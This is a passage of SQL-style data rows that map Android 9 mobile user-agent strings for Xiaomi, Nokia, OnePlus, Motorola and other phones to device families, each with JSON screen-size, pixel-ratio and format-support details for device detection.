Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI CC 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI CC 9e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MI MAX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MIX 2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MIX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MOVE9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MRD-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MRD-LX1F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MRD-LX1N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MRD-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MRD-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Mi-4c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Moto Z (2)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Moto Z2 Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Moto Z3 Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; MotoG3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; N20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; NEO-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; NOTE 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; NX629J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Neffos C7s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Neffos C9 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Neffos C9s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Neffos X20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Neffos X20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nexus 5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nexus 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nexus 6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 2 V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 2.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 2.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 3.1 A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 3.1 C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 3.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 3.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 3.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 4.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 5.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 6.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 7 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 7.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 7.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 8 Sirocco) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 8.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":376,\"screenHeight\":753,\"pixelRatio\":1.275,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia C2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Nokia X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Note_7P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONE A2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A3000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A3003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A3010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A6010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ONEPLUS A6013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Orange Neva play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Orange Neva start) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Orange Rise 55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; P30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; P6000_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PACM00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PAR-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PAR-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PAR-LX1M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PAR-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PAR-TL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PCT-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PCT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; PH-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":437,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POCO F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/* 